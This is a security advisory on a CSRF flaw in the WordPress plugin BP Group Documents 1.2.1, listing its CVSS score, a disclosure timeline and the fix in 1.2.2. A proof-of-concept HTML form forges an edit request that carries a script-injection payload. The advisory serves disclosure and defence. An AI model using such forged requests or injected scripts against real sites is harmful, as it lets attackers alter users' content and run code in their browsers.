CSRF vulnerability in BP Group Documents 1.2.1


Last revised:

An unauthenticated user can cause a logged in user to edit the name and description of any existing group document. The fields are also vulnerable to XSS.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score 5 Medium
Vector Network
Complexity Low
Authentication None
Confidentiality None
Integrity Partial
Availability None
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Assume we have a group with slug “x” and a group document with id 8:

<form method="POST" action="https://wp.ayumu/groups/x/documents/">
  <input type="text" name="bp_group_documents_operation" value="edit">
  <input type="text" name="bp_group_documents_id" value="8">
  <input type="text" name="bp_group_documents_name" value="&lt;script>alert(1)&lt;/script>">
  <input type="text" name="bp_group_documents_description" value="abc">
  <input type="submit">

Advisory timeline

  • 2013-09-26: Discovered
  • 2013-09-30: Reported to
  • 2013-10-04: Fix released (1.2.2)

Mitigation/further actions

Update to version 1.2.2.